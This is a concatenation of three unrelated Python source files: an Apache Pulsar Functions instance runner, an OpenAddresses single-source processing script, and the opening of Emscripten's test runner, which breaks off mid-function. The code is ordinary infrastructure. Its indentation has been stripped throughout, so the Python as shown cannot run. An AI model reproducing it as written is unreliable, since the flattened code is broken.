# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# -*- encoding: utf-8 -*-
"""python_instance.py: Python Instance for running python functions
"""
import base64
import os
import signal
import time
import Queue
import threading
from functools import partial
from collections import namedtuple
from threading import Timer
import traceback
import sys
import pulsar
import contextimpl
import Function_pb2
import log
import util
import InstanceCommunication_pb2
Log = log.Log
# Equivalent of the InstanceConfig in Java
InstanceConfig = namedtuple('InstanceConfig', 'instance_id function_id function_version function_details max_buffered_tuples')
# This is the message that the consumers put on the queue for the function thread to process
InternalMessage = namedtuple('InternalMessage', 'message topic serde consumer')
InternalQuitMessage = namedtuple('InternalQuitMessage', 'quit')
DEFAULT_SERIALIZER = "serde.IdentitySerDe"
# We keep track of the following metrics
class Stats(object):
def __init__(self):
self.reset()
def reset(self):
self.nprocessed = 0
self.nsuccessfullyprocessed = 0
self.nuserexceptions = 0
self.latestuserexceptions = []
self.nsystemexceptions = 0
self.latestsystemexceptions = []
self.ndeserialization_exceptions = {}
self.nserialization_exceptions = 0
self.latency = 0
self.lastinvocationtime = 0
def increment_deser_errors(self, topic):
if topic not in self.ndeserialization_exceptions:
self.ndeserialization_exceptions[topic] = 0
self.ndeserialization_exceptions[topic] += 1
def increment_successfully_processed(self, latency):
self.nsuccessfullyprocessed += 1
self.latency += latency
def increment_processed(self, processed_at):
self.nprocessed += 1
self.lastinvocationtime = processed_at
def record_user_exception(self, ex):
self.latestuserexceptions.append((traceback.format_exc(), int(time.time() * 1000)))
if len(self.latestuserexceptions) > 10:
self.latestuserexceptions.pop(0)
self.nuserexceptions = self.nuserexceptions + 1
def record_system_exception(self, ex):
self.latestsystemexceptions.append((traceback.format_exc(), int(time.time() * 1000)))
if len(self.latestsystemexceptions) > 10:
self.latestsystemexceptions.pop(0)
self.nsystemexceptions = self.nsystemexceptions + 1
def compute_latency(self):
if self.nsuccessfullyprocessed <= 0:
return 0
else:
return self.latency / self.nsuccessfullyprocessed
def update(self, object):
self.nprocessed = object.nprocessed
self.nsuccessfullyprocessed = object.nsuccessfullyprocessed
self.nuserexceptions = object.nuserexceptions
self.nsystemexceptions = object.nsystemexceptions
self.nserialization_exceptions = object.nserialization_exceptions
self.latency = object.latency
self.lastinvocationtime = object.lastinvocationtime
self.latestuserexceptions = []
self.latestsystemexceptions = []
self.ndeserialization_exceptions.clear()
self.latestuserexceptions.append(object.latestuserexceptions)
self.latestsystemexceptions.append(object.latestsystemexceptions)
self.ndeserialization_exceptions.update(object.ndeserialization_exceptions)
class PythonInstance(object):
def __init__(self, instance_id, function_id, function_version, function_details, max_buffered_tuples, user_code, log_topic, pulsar_client):
self.instance_config = InstanceConfig(instance_id, function_id, function_version, function_details, max_buffered_tuples)
self.user_code = user_code
self.queue = Queue.Queue(max_buffered_tuples)
self.log_topic_handler = None
if log_topic is not None:
self.log_topic_handler = log.LogTopicHandler(str(log_topic), pulsar_client)
self.pulsar_client = pulsar_client
self.input_serdes = {}
self.consumers = {}
self.output_serde = None
self.function_class = None
self.function_purefunction = None
self.producer = None
self.exeuction_thread = None
self.atmost_once = self.instance_config.function_details.processingGuarantees == Function_pb2.ProcessingGuarantees.Value('ATMOST_ONCE')
self.atleast_once = self.instance_config.function_details.processingGuarantees == Function_pb2.ProcessingGuarantees.Value('ATLEAST_ONCE')
self.auto_ack = self.instance_config.function_details.autoAck
self.contextimpl = None
self.total_stats = Stats()
self.current_stats = Stats()
self.stats = Stats()
self.last_health_check_ts = time.time()
self.timeout_ms = function_details.source.timeoutMs if function_details.source.timeoutMs > 0 else None
def health_check(self):
self.last_health_check_ts = time.time()
health_check_result = InstanceCommunication_pb2.HealthCheckResult()
health_check_result.success = True
return health_check_result
def process_spawner_health_check_timer(self):
if time.time() - self.last_health_check_ts > 90:
Log.critical("Haven't received health check from spawner in a while. Stopping instance...")
os.kill(os.getpid(), signal.SIGTERM)
sys.exit(1)
Timer(30, self.process_spawner_health_check_timer).start()
def run(self):
# Setup consumers and input deserializers
mode = pulsar._pulsar.ConsumerType.Shared
if self.instance_config.function_details.source.subscriptionType == Function_pb2.SubscriptionType.Value("FAILOVER"):
mode = pulsar._pulsar.ConsumerType.Failover
subscription_name = str(self.instance_config.function_details.tenant) + "/" + \
str(self.instance_config.function_details.namespace) + "/" + \
str(self.instance_config.function_details.name)
for topic, serde in self.instance_config.function_details.source.topicsToSerDeClassName.items():
if not serde:
serde_kclass = util.import_class(os.path.dirname(self.user_code), DEFAULT_SERIALIZER)
else:
serde_kclass = util.import_class(os.path.dirname(self.user_code), serde)
self.input_serdes[topic] = serde_kclass()
Log.info("Setting up consumer for topic %s with subname %s" % (topic, subscription_name))
self.consumers[topic] = self.pulsar_client.subscribe(
str(topic), subscription_name,
consumer_type=mode,
message_listener=partial(self.message_listener, topic, self.input_serdes[topic]),
unacked_messages_timeout_ms=int(self.timeout_ms) if self.timeout_ms else None
)
function_kclass = util.import_class(os.path.dirname(self.user_code), self.instance_config.function_details.className)
if function_kclass is None:
Log.critical("Could not import User Function Module %s" % self.instance_config.function_details.className)
raise NameError("Could not import User Function Module %s" % self.instance_config.function_details.className)
try:
self.function_class = function_kclass()
except:
self.function_purefunction = function_kclass
self.contextimpl = contextimpl.ContextImpl(self.instance_config, Log, self.pulsar_client, self.user_code, self.consumers)
# Now launch a thread that does execution
self.exeuction_thread = threading.Thread(target=self.actual_execution)
self.exeuction_thread.start()
# start proccess spawner health check timer
self.last_health_check_ts = time.time()
Timer(30, self.process_spawner_health_check_timer).start()
def actual_execution(self):
Log.info("Started Thread for executing the function")
while True:
msg = self.queue.get(True)
if isinstance(msg, InternalQuitMessage):
break
user_exception = False
system_exception = False
Log.debug("Got a message from topic %s" % msg.topic)
input_object = None
try:
input_object = msg.serde.deserialize(msg.message.data())
except:
self.current_stats.increment_deser_errors(msg.topic)
self.total_stats.increment_deser_errors(msg.topic)
continue
self.contextimpl.set_current_message_context(msg.message.message_id(), msg.topic)
output_object = None
self.saved_log_handler = None
if self.log_topic_handler is not None:
self.saved_log_handler = log.remove_all_handlers()
log.add_handler(self.log_topic_handler)
start_time = time.time()
self.current_stats.increment_processed(int(start_time) * 1000)
self.total_stats.increment_processed(int(start_time) * 1000)
successfully_executed = False
try:
if self.function_class is not None:
output_object = self.function_class.process(input_object, self.contextimpl)
else:
output_object = self.function_purefunction.process(input_object)
successfully_executed = True
except Exception as e:
Log.exception("Exception while executing user method")
self.total_stats.record_user_exception(e)
self.current_stats.record_user_exception(e)
end_time = time.time()
latency = (end_time - start_time) * 1000
self.total_stats.increment_successfully_processed(latency)
self.current_stats.increment_successfully_processed(latency)
if self.log_topic_handler is not None:
log.remove_all_handlers()
log.add_handler(self.saved_log_handler)
if successfully_executed:
self.process_result(output_object, msg)
def done_producing(self, consumer, orig_message, result, sent_message):
if result == pulsar.Result.Ok and self.auto_ack and self.atleast_once:
consumer.acknowledge(orig_message)
def process_result(self, output, msg):
if output is not None:
output_bytes = None
if self.output_serde is None:
self.setup_output_serde()
if self.producer is None:
self.setup_producer()
try:
output_bytes = bytes(self.output_serde.serialize(output))
except:
self.current_stats.nserialization_exceptions += 1
self.total_stats.nserialization_exceptions += 1
if output_bytes is not None:
props = {"__pfn_input_topic__" : str(msg.topic), "__pfn_input_msg_id__" : base64.b64encode(msg.message.message_id().serialize())}
try:
self.producer.send_async(output_bytes, partial(self.done_producing, msg.consumer, msg.message), properties=props)
except Exception as e:
self.current_stats.record_system_exception(e)
self.total_stats.record_system_exception(e)
elif self.auto_ack and self.atleast_once:
msg.consumer.acknowledge(msg.message)
def setup_output_serde(self):
if self.instance_config.function_details.sink.serDeClassName != None and \
len(self.instance_config.function_details.sink.serDeClassName) > 0:
serde_kclass = util.import_class(os.path.dirname(self.user_code), self.instance_config.function_details.sink.serDeClassName)
self.output_serde = serde_kclass()
else:
global DEFAULT_SERIALIZER
serde_kclass = util.import_class(os.path.dirname(self.user_code), DEFAULT_SERIALIZER)
self.output_serde = serde_kclass()
def setup_producer(self):
if self.instance_config.function_details.sink.topic != None and \
len(self.instance_config.function_details.sink.topic) > 0:
Log.info("Setting up producer for topic %s" % self.instance_config.function_details.sink.topic)
self.producer = self.pulsar_client.create_producer(
str(self.instance_config.function_details.sink.topic),
block_if_queue_full=True,
batching_enabled=True,
batching_max_publish_delay_ms=1,
max_pending_messages=100000)
def message_listener(self, topic, serde, consumer, message):
item = InternalMessage(message, topic, serde, consumer)
self.queue.put(item, True)
if self.atmost_once and self.auto_ack:
consumer.acknowledge(message)
def get_and_reset_metrics(self):
# First get any user metrics
metrics = self.get_metrics()
self.reset_metrics()
return metrics
def reset_metrics(self):
self.stats.update(self.current_stats)
self.current_stats.reset()
self.contextimpl.reset_metrics()
def get_metrics(self):
# First get any user metrics
metrics = self.contextimpl.get_metrics()
# Now add system metrics as well
self.add_system_metrics("__total_processed__", self.stats.nprocessed, metrics)
self.add_system_metrics("__total_successfully_processed__", self.stats.nsuccessfullyprocessed, metrics)
self.add_system_metrics("__total_system_exceptions__", self.stats.nsystemexceptions, metrics)
self.add_system_metrics("__total_user_exceptions__", self.stats.nuserexceptions, metrics)
for (topic, metric) in self.stats.ndeserialization_exceptions.items():
self.add_system_metrics("__total_deserialization_exceptions__" + topic, metric, metrics)
self.add_system_metrics("__total_serialization_exceptions__", self.stats.nserialization_exceptions, metrics)
self.add_system_metrics("__avg_latency_ms__", self.stats.compute_latency(), metrics)
return metrics
def add_system_metrics(self, metric_name, value, metrics):
metrics.metrics[metric_name].count = value
metrics.metrics[metric_name].sum = value
metrics.metrics[metric_name].min = 0
metrics.metrics[metric_name].max = value
def get_function_status(self):
status = InstanceCommunication_pb2.FunctionStatus()
status.running = True
status.numProcessed = self.total_stats.nprocessed
status.numSuccessfullyProcessed = self.total_stats.nsuccessfullyprocessed
status.numUserExceptions = self.total_stats.nuserexceptions
status.instanceId = self.instance_config.instance_id
for ex, tm in self.total_stats.latestuserexceptions:
to_add = status.latestUserExceptions.add()
to_add.exceptionString = ex
to_add.msSinceEpoch = tm
status.numSystemExceptions = self.total_stats.nsystemexceptions
for ex, tm in self.total_stats.latestsystemexceptions:
to_add = status.latestSystemExceptions.add()
to_add.exceptionString = ex
to_add.msSinceEpoch = tm
for (topic, metric) in self.total_stats.ndeserialization_exceptions.items():
status.deserializationExceptions[topic] = metric
status.serializationExceptions = self.total_stats.nserialization_exceptions
status.averageLatency = self.total_stats.compute_latency()
status.lastInvocationTime = self.total_stats.lastinvocationtime
return status
def join(self):
self.queue.put(InternalQuitMessage(True), True)
self.exeuction_thread.join()
|
process_one.py
|
from __future__ import absolute_import, division, print_function
import logging; _L = logging.getLogger('openaddr.process_one')
from urllib.parse import urlparse
from os.path import join, basename, dirname, exists, splitext, relpath
from shutil import copy, move, rmtree
from argparse import ArgumentParser
from os import mkdir, rmdir, close, chmod
from _thread import get_ident
import tempfile, json, csv, sys, enum
import threading
from . import util, cache, conform, preview, slippymap, CacheResult, ConformResult, __version__
from .cache import DownloadError
from .conform import check_source_tests
from esridump.errors import EsriDownloadError
class SourceSaysSkip(RuntimeError): pass
class SourceTestsFailed(RuntimeError): pass
@enum.unique
class SourceProblem (enum.Enum):
''' Possible problems encountered in a source.
'''
skip_source = 'Source says to skip'
missing_conform = 'Source is missing a conform object'
unknown_conform_type = 'Unknown source conform type'
download_source_failed = 'Could not download source data'
conform_source_failed = 'Could not conform source data'
no_coverage = 'Missing or incomplete coverage'
no_esri_token = 'Missing required ESRI token'
test_failed = 'An acceptance test failed'
no_addresses_found = 'Found no addresses in source data'
def boolstr(value):
'''
'''
if value is True:
return 'true'
if value is False:
return 'false'
if value is None:
return ''
raise ValueError(repr(value))
def process(source, destination, do_preview, mapzen_key=None, extras=dict()):
''' Process a single source and destination, return path to JSON state file.
Creates a new directory and files under destination.
'''
# The main processing thread holds wait_lock until it is done.
# The logging thread periodically writes data in the background,
# then exits once the main thread releases the lock.
wait_lock = threading.Lock()
proc_wait = threading.Thread(target=util.log_process_usage, args=(wait_lock, ))
temp_dir = tempfile.mkdtemp(prefix='process_one-', dir=destination)
temp_src = join(temp_dir, basename(source))
copy(source, temp_src)
log_handler = get_log_handler(temp_dir)
logging.getLogger('openaddr').addHandler(log_handler)
with wait_lock:
proc_wait.start()
cache_result, conform_result = CacheResult.empty(), ConformResult.empty()
preview_path, slippymap_path, skipped_source = None, None, False
tests_passed = None
try:
with open(temp_src) as file:
if json.load(file).get('skip', None):
raise SourceSaysSkip()
# Check tests in source data.
with open(temp_src) as file:
tests_passed, failure_details = check_source_tests(json.load(file))
if tests_passed is False:
raise SourceTestsFailed(failure_details)
# Cache source data.
try:
cache_result = cache(temp_src, temp_dir, extras)
except EsriDownloadError as e:
_L.warning('Could not download ESRI source data: {}'.format(e))
raise
except DownloadError as e:
_L.warning('Could not download source data')
raise
if not cache_result.cache:
_L.warning('Nothing cached')
else:
_L.info(u'Cached data in {}'.format(cache_result.cache))
# Conform cached source data.
conform_result = conform(temp_src, temp_dir, cache_result.todict())
if not conform_result.path:
_L.warning('Nothing processed')
else:
_L.info('Processed data in {}'.format(conform_result.path))
if do_preview and mapzen_key:
preview_path = render_preview(conform_result.path, temp_dir, mapzen_key)
if do_preview:
slippymap_path = render_slippymap(conform_result.path, temp_dir)
if not preview_path:
_L.warning('Nothing previewed')
else:
_L.info('Preview image in {}'.format(preview_path))
except SourceSaysSkip:
_L.info('Source says to skip in process_one.process()')
skipped_source = True
except SourceTestsFailed as e:
_L.warning('A source test failed in process_one.process(): %s', str(e))
tests_passed = False
except Exception:
_L.warning('Error in process_one.process()', exc_info=True)
finally:
# Make sure this gets done no matter what
logging.getLogger('openaddr').removeHandler(log_handler)
# Write output
state_path = write_state(source, skipped_source, destination, log_handler,
tests_passed, cache_result, conform_result, preview_path, slippymap_path,
temp_dir)
log_handler.close()
rmtree(temp_dir)
return state_path
def render_preview(csv_filename, temp_dir, mapzen_key):
'''
'''
png_filename = join(temp_dir, 'preview.png')
preview.render(csv_filename, png_filename, 668, 2, mapzen_key)
return png_filename
def render_slippymap(csv_filename, temp_dir):
'''
'''
try:
mbtiles_filename = join(temp_dir, 'slippymap.mbtiles')
slippymap.generate(mbtiles_filename, csv_filename)
except Exception as e:
_L.error('%s in render_slippymap: %s', type(e), e)
return None
else:
return mbtiles_filename
class LogFilterCurrentThread:
''' Logging filter object to match only record in the current thread.
'''
def __init__(self):
# Seems to work as unique ID with multiprocessing.Process() as well as threading.Thread()
self.thread_id = get_ident()
def filter(self, record):
return record.thread == self.thread_id
def get_log_handler(directory):
''' Create a new file handler and return it.
'''
handle, filename = tempfile.mkstemp(dir=directory, suffix='.log')
close(handle)
chmod(filename, 0o644)
handler = logging.FileHandler(filename)
handler.setFormatter(logging.Formatter(u'%(asctime)s %(levelname)08s: %(message)s'))
handler.setLevel(logging.DEBUG)
# # Limit log messages to the current thread
# handler.addFilter(LogFilterCurrentThread())
return handler
def find_source_problem(log_contents, source):
'''
'''
if 'WARNING: A source test failed' in log_contents:
return SourceProblem.test_failed
if 'WARNING: Source is missing a conform object' in log_contents:
return SourceProblem.missing_conform
if 'WARNING: Unknown source conform type' in log_contents:
return SourceProblem.unknown_conform_type
if 'WARNING: Found no addresses in source data' in log_contents:
return SourceProblem.no_addresses_found
if 'WARNING: Could not download source data' in log_contents:
return SourceProblem.download_source_failed
if 'WARNING: Error doing conform; skipping' in log_contents:
return SourceProblem.conform_source_failed
if 'WARNING: Could not download ESRI source data: Could not retrieve layer metadata: Token Required' in log_contents:
return SourceProblem.no_esri_token
if 'coverage' in source:
coverage = source.get('coverage')
if 'US Census' in coverage or 'ISO 3166' in coverage or 'geometry' in coverage:
pass
else:
return SourceProblem.no_coverage
else:
return SourceProblem.no_coverage
return None
def write_state(source, skipped, destination, log_handler, tests_passed,
cache_result, conform_result, preview_path, slippymap_path,
temp_dir):
'''
'''
source_id, _ = splitext(basename(source))
statedir = join(destination, source_id)
if not exists(statedir):
mkdir(statedir)
if cache_result.cache:
scheme, _, cache_path1, _, _, _ = urlparse(cache_result.cache)
if scheme in ('file', ''):
cache_path2 = join(statedir, 'cache{1}'.format(*splitext(cache_path1)))
copy(cache_path1, cache_path2)
state_cache = relpath(cache_path2, statedir)
else:
state_cache = cache_result.cache
else:
state_cache = None
if conform_result.path:
_, _, processed_path1, _, _, _ = urlparse(conform_result.path)
processed_path2 = join(statedir, 'out{1}'.format(*splitext(processed_path1)))
copy(processed_path1, processed_path2)
# Write the sample data to a sample.json file
if conform_result.sample:
sample_path = join(statedir, 'sample.json')
with open(sample_path, 'w') as sample_file:
json.dump(conform_result.sample, sample_file, indent=2)
if preview_path:
preview_path2 = join(statedir, 'preview.png')
copy(preview_path, preview_path2)
if slippymap_path:
slippymap_path2 = join(statedir, 'slippymap.mbtiles')
copy(slippymap_path, slippymap_path2)
log_handler.flush()
output_path = join(statedir, 'output.txt')
copy(log_handler.stream.name, output_path)
if skipped:
source_problem = SourceProblem.skip_source
else:
with open(output_path) as file:
log_content = file.read()
if exists(source):
with open(source) as file:
source_data = json.load(file)
else:
source_data = {}
source_problem = find_source_problem(log_content, source_data)
state = [
('source', basename(source)),
('skipped', bool(skipped)),
('cache', state_cache),
('sample', conform_result.sample and relpath(sample_path, statedir)),
('website', conform_result.website),
('license', conform_result.license),
('geometry type', conform_result.geometry_type),
('address count', conform_result.address_count),
('version', cache_result.version),
('fingerprint', cache_result.fingerprint),
('cache time', cache_result.elapsed and str(cache_result.elapsed)),
('processed', conform_result.path and relpath(processed_path2, statedir)),
('process time', conform_result.elapsed and str(conform_result.elapsed)),
('output', relpath(output_path, statedir)),
('preview', preview_path and relpath(preview_path2, statedir)),
('slippymap', slippymap_path and relpath(slippymap_path2, statedir)),
('attribution required', boolstr(conform_result.attribution_flag)),
('attribution name', conform_result.attribution_name),
('share-alike', boolstr(conform_result.sharealike_flag)),
('source problem', getattr(source_problem, 'value', None)),
('code version', __version__),
('tests passed', tests_passed),
]
with open(join(statedir, 'index.txt'), 'w', encoding='utf8') as file:
out = csv.writer(file, dialect='excel-tab')
for row in zip(*state):
out.writerow(row)
with open(join(statedir, 'index.json'), 'w') as file:
json.dump(list(zip(*state)), file, indent=2)
_L.info(u'Wrote to state: {}'.format(file.name))
return file.name
parser = ArgumentParser(description='Run one source file locally, prints output path.')
parser.add_argument('source', help='Required source file name.')
parser.add_argument('destination', help='Required output directory name.')
parser.add_argument('--render-preview', help='Render a map preview',
action='store_const', dest='render_preview',
const=True, default=False)
parser.add_argument('--skip-preview', help="Don't render a map preview",
action='store_const', dest='render_preview',
const=False, default=False)
parser.add_argument('--mapzen-key', dest='mapzen_key',
help='Mapzen API Key. See: https://mapzen.com/documentation/overview/')
parser.add_argument('-l', '--logfile', help='Optional log file name.')
parser.add_argument('-v', '--verbose', help='Turn on verbose logging',
action='store_const', dest='loglevel',
const=logging.DEBUG, default=logging.INFO)
parser.add_argument('-q', '--quiet', help='Turn off most logging',
action='store_const', dest='loglevel',
const=logging.WARNING, default=logging.INFO)
def main():
'''
'''
from .jobs import setup_logger
args = parser.parse_args()
setup_logger(logfile=args.logfile, log_level=args.loglevel)
# Allow CSV files with very long fields
csv.field_size_limit(sys.maxsize)
try:
file_path = process(args.source, args.destination, args.render_preview, mapzen_key=args.mapzen_key)
except Exception as e:
_L.error(e, exc_info=True)
return 1
else:
print(file_path)
return 0
if __name__ == '__main__':
exit(main())
|
runner.py
|
#!/usr/bin/env python3
# Copyright 2010 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
"""This is the Emscripten test runner. To run some tests, specify which tests
you want, for example
python tests/runner.py asm1.test_hello_world
There are many options for which tests to run and how to run them. For details,
see
http://kripken.github.io/emscripten-site/docs/getting_started/test-suite.html
"""
# XXX Use EMTEST_ALL_ENGINES=1 in the env to test all engines!
from __future__ import print_function
from subprocess import PIPE, STDOUT
from functools import wraps
import argparse
import atexit
import contextlib
import difflib
import fnmatch
import glob
import hashlib
import json
import logging
import math
import multiprocessing
import operator
import os
import random
import re
import shlex
import shutil
import string
import subprocess
import sys
import tempfile
import time
import unittest
import webbrowser
if sys.version_info.major == 2:
from BaseHTTPServer import HTTPServer
from SimpleHTTPServer import SimpleHTTPRequestHandler
from urllib import unquote, unquote_plus
else:
from http.server import HTTPServer, SimpleHTTPRequestHandler
from urllib.parse import unquote, unquote_plus
# Setup
__rootpath__ = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.append(__rootpath__)
import parallel_runner
from tools.shared import EM_CONFIG, TEMP_DIR, EMCC, EMXX, DEBUG, PYTHON, LLVM_TARGET, ASM_JS_TARGET, EMSCRIPTEN_TEMP_DIR, WASM_TARGET, SPIDERMONKEY_ENGINE, WINDOWS, EM_BUILD_VERBOSE
from tools.shared import asstr, get_canonical_temp_dir, Building, run_process, try_delete, asbytes, safe_copy, Settings
from tools import jsrun, shared, line_endings
def path_from_root(*pathelems):
return os.path.join(__rootpath__, *pathelems)
sys.path.append(path_from_root('third_party/websockify'))
logger = logging.getLogger(__file__)
# User can specify an environment variable EMTEST_BROWSER to force the browser
# test suite to run using another browser command line than the default system
# browser. Setting '0' as the browser disables running a browser (but we still
# see tests compile)
EMTEST_BROWSER = os.getenv('EMTEST_BROWSER')
EMTEST_DETECT_TEMPFILE_LEAKS = int(os.getenv('EMTEST_DETECT_TEMPFILE_LEAKS', '0'))
# Also suppot the old name: EM_SAVE_DIR
EMTEST_SAVE_DIR = os.getenv('EMTEST_SAVE_DIR', os.getenv('EM_SAVE_DIR'))
# generally js engines are equivalent, testing 1 is enough. set this
# to force testing on all js engines, good to find js engine bugs
EMTEST_ALL_ENGINES = os.getenv('EMTEST_ALL_ENGINES')
EMTEST_SKIP_SLOW = os.getenv('EMTEST_SKIP_SLOW')
EMTEST_VERBOSE = int(os.getenv('EMTEST_VERBOSE', '0'))
if EMTEST_VERBOSE:
logging.root.setLevel(logging.DEBUG)
# checks if browser testing is enabled
def has_browser():
return EMTEST_BROWSER != '0'
# Generic decorator that calls a function named 'condition' on the test class and
# skips the test if that function returns true
def skip_if(func, condition, explanation='', negate=False):
assert callable(func)
explanation_str = ' : %s' % explanation if explanation else ''
@wraps(func)
def decorated(self, *args, **kwargs):
choice = self.__getattribute__(condition)()
if negate:
choice = not choice
if choice:
self.skipTest(condition + explanation_str)
func(self, *args, **kwargs)
return decorated
def needs_dlfcn(func):
assert callable(func)
@wraps(func)
def decorated(self):
self.check_dlfcn()
return func(self)
return decorated
def is_slow_test(func):
assert callable(func)
@wraps(func)
def decorated(self, *args, **kwargs):
if EMTEST_SKIP_SLOW:
return self.skipTest('skipping slow tests')
return func(self, *args, **kwargs)
return decorated
def no_wasm_backend(note=''):
assert not callable(note)
def decorated(f):
return skip_if(f, 'is_wasm_backend', note)
return decorated
def no_fastcomp(note=''):
assert not callable(note)
def decorated(f):
return skip_if(f, 'is_wasm_backend', note, negate=True)
return decorated
def no_windows(note=''):
assert not callable(note)
if WINDOWS:
return unittest.skip(note)
return lambda f: f
def no_asmjs(note=''):
assert not callable(note)
def decorated(f):
return skip_if(f, 'is_wasm', note, negate=True)
return decorated
@contextlib.contextmanager
def env_modify(updates):
"""A context manager that updates os.environ."""
# This could also be done with mock.patch.dict() but taking a dependency
# on the mock library is probably not worth the benefit.
old_env = os.environ.copy()
print("env_modify: " + str(updates))
# Seting a value to None means clear the environment variable
clears = [key for key, value in updates.items() if value is None]
updates = {key: value for key, value in updates.items() if value is not None}
os.environ.update(updates)
for key in clears:
if key in os.environ:
del os.environ[key]
try:
yield
finally:
os.environ.clear()
os.environ.update(old_env)
# Decorator version of env_modify
def with_env_modify(updates):
def decorated(f):
def modified(self):
with env_modify(updates):
return f(self)
return modified
return decorated
@contextlib.contextmanager
def chdir(dir):
"""A context manager that performs actions in the given directory."""
orig_cwd = os.getcwd()
os.chdir(dir)
try:
yield
finally:
os.chdir(orig_cwd)
def ensure_dir(dirname):
if not os.path.isdir(dirname):
os.makedirs(dirname)
def limit_size(string, maxbytes=800000 * 20, maxlines=100000):
lines = string.splitlines()
if len(lines) > maxlines:
lines = lines[0:maxlines // 2] + ['[..]'] + lines[-maxlines // 2:]
string = '\n'.join(lines)
if len(string) > maxbytes:
string = string[0:maxbytes // 2] + '\n[..]\n' + string[-maxbytes // 2:]
return string
def create_test_file(name, contents, binary=False):
assert not os.path.isabs(name)
mode = 'wb' if binary else 'w'
with open(name, mode) as f:
f.write(contents)
# The core test modes
core_test_modes = [
'wasm0',
'wasm1',
'wasm2',
'wasm3',
'wasms',
'wasmz',
]
if shared.Settings.WASM_BACKEND:
core_test_modes += [
'wasm2js0',
'wasm2js1',
'wasm2js2',
'wasm2js3',
'wasm2jss',
'wasm2jsz',
]
else:
core_test_modes += [
'asm0',
'asm2',
'asm3',
'asm2g',
'asm2f',
]
# The default core test mode, used when none is specified
default_core_test_mode = 'wasm0'
# The non-core test modes
non_core_test_modes = [
'other',
'browser',
'sanity',
'sockets',
'interactive',
'benchmark',
]
if shared.Settings.WASM_BACKEND:
non_core_test_modes += [
'asan',
'lsan',
'wasm2ss',
]
def parameterized(parameters):
"""
Mark a test as parameterized.
Usage:
@parameterized({
'subtest1': (1, 2, 3),
'subtest2': (4, 5, 6),
})
def test_something(self, a, b, c):
... # actual test body
This is equivalent to defining two tests:
def test_something_subtest1(self):
# runs test_something(1, 2, 3)
def test_something_subtest2(self):
# runs test_something(4, 5, 6)
"""
def decorator(func):
func._parameterize = parameters
return func
return decorator
class RunnerMeta(type):
@classmethod
def make_test(mcs, name, func, suffix, args):
"""
This is a helper function to create new test functions for each parameterized form.
:param name: the original name of the function
:param func: the original function that we are parameterizing
:param suffix: the suffix to append to the name of the function for this parameterization
:param args: the positional arguments to pass to the original function for this parameterization
:returns: a tuple of (new_function_name, new_function_object)
"""
# Create the new test function. It calls the original function with the specified args.
# We use @functools.wraps to copy over all the function attributes.
@wraps(func)
def resulting_test(self):
return func(self, *args)
# Add suffix to the function name so that it displays correctly.
if suffix:
resulting_test.__name__ = '%s_%s' % (name, suffix)
else:
resulting_test.__name__ = name
# On python 3, functions have __qualname__ as well. This is a full dot-separated path to the function.
# We add the suffix to it as well.
if hasattr(func, '__qualname__'):
resulting_test.__qualname__ = '%s_%s' % (func.__qualname__, suffix)
return resulting_test.__name__, resulting_test
def __new__(mcs, name, bases, attrs):
# This metaclass expands parameterized methods from `attrs` into separate ones in `new_attrs`.
new_attrs = {}
for attr_name, value in attrs.items():
# Check if a member of the new class has _parameterize, the tag inserted by @parameterized.
if hasattr(value, '_parameterize'):
# If it does, we extract the parameterization information, build new test functions.
for suffix, args in value._parameterize.items():
new_name, func = mcs.make_test(attr_name, value, suffix, args)
assert new_name not in new_attrs, 'Duplicate attribute name generated when parameterizing %s' % attr_name
new_attrs[new_name] = func
else:
# If not, we just copy it over to new_attrs verbatim.
assert attr_name not in new_attrs, '%s collided with an attribute from parameterization' % attr_name
new_attrs[attr_name] = value
# We invoke type, the default metaclass, to actually create the new class, with new_attrs.
return type.__new__(mcs, name, bases, new_attrs)
# This is a hack to make the metaclass work on both python 2 and python 3.
#
# On python 3, the code should be:
# class RunnerCore(unittest.TestCase, metaclass=RunnerMeta):
# ...
#
# On python 2, the code should be:
# class RunnerCore(unittest.TestCase):
# __metaclass__ = RunnerMeta
# ...
#
# To be compatible with both python 2 and python 3, we create a class by directly invoking the
# metaclass, which is done in the same way on both python 2 and 3, and inherit from it,
# since a class inherits the metaclass by default.
class RunnerCore(RunnerMeta('TestCase', (unittest.TestCase,), {})):
# default temporary directory settings. set_temp_dir may be called later to
# override these
temp_dir = TEMP_DIR
canonical_temp_dir = get_canonical_temp_dir(TEMP_DIR)
# This avoids cluttering the test runner output, which is stderr too, with compiler warnings etc.
# Change this to None to get stderr reporting, for debugging purposes
stderr_redirect = STDOUT
def is_emterpreter(self):
return self.get_setting('EMTERPRETIFY')
def is_wasm(self):
return self.get_setting('WASM') != 0
def is_wasm_backend(self):
return self.get_setting('WASM_BACKEND')
def check_dlfcn(self):
if self.get_setting('ALLOW_MEMORY_GROWTH') == 1 and not self.is_wasm():
self.skipTest('no dlfcn with memory growth (without wasm)')
if self.get_setting('WASM_BACKEND') and not self.get_setting('WASM'):
self.skipTest('no dynamic library support in wasm2js yet')
def uses_memory_init_file(self):
if self.get_setting('SIDE_MODULE') or \
(self.get_setting('WASM') and not self.get_setting('WASM2JS')):
return False
elif '--memory-init-file' in self.emcc_args:
return int(self.emcc_args[self.emcc_args.index('--memory-init-file') + 1])
else:
# side modules handle memory differently; binaryen puts the memory in the wasm module
opt_supports = any(opt in self.emcc_args for opt in ('-O2', '-O3', '-Os', '-Oz'))
return opt_supports
def set_temp_dir(self, temp_dir):
self.temp_dir = temp_dir
self.canonical_temp_dir = get_canonical_temp_dir(self.temp_dir)
# Explicitly set dedicated temporary directory for parallel tests
os.environ['EMCC_TEMP_DIR'] = self.temp_dir
@classmethod
def setUpClass(cls):
super(RunnerCore, cls).setUpClass()
print('(checking sanity from test runner)') # do this after we set env stuff
shared.check_sanity(force=True)
def setUp(self):
super(RunnerCore, self).setUp()
self.settings_mods = {}
self.emcc_args = ['-Werror']
self.save_dir = EMTEST_SAVE_DIR
self.env = {}
self.temp_files_before_run = []
if EMTEST_DETECT_TEMPFILE_LEAKS:
for root, dirnames, filenames in os.walk(self.temp_dir):
for dirname in dirnames:
self.temp_files_before_run.append(os.path.normpath(os.path.join(root, dirname)))
for filename in filenames:
